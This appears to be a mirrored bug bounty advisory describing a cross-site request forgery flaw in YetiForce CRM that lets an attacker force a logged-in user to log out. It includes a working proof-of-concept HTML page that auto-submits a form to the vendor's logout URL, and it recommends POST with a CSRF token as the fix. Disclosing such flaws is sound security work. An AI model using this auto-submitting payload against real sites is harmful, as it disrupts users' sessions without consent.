Lucene search

K
huntrKhanhchauminh7B58C160-BB62-45FE-AD1F-38354378B89E
HistoryDec 09, 2021 - 2:53 a.m.

Cross-Site Request Forgery (CSRF) in yetiforcecompany/yetiforcecrm

2021-12-0902:53:32
khanhchauminh
www.huntr.dev
9
csrf
yetiforcecompany
yetiforcecrm
user logout
csrf token
bug bounty

EPSS

0.001

Percentile

31.4%

Description

An attacker is able to log out a user if a logged-in user visits the attacker’s website.

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://gitstable.yetiforce.com/index.php?module=Users&parent=Settings&action=Logout">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability is capable of forging users to unintentional logout.

More details

One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.

Note

While this cannot harm a user’s account, it can be a great annoyance and is a valid CSRF.

EPSS

0.001

Percentile

31.4%

Related for 7B58C160-BB62-45FE-AD1F-38354378B89E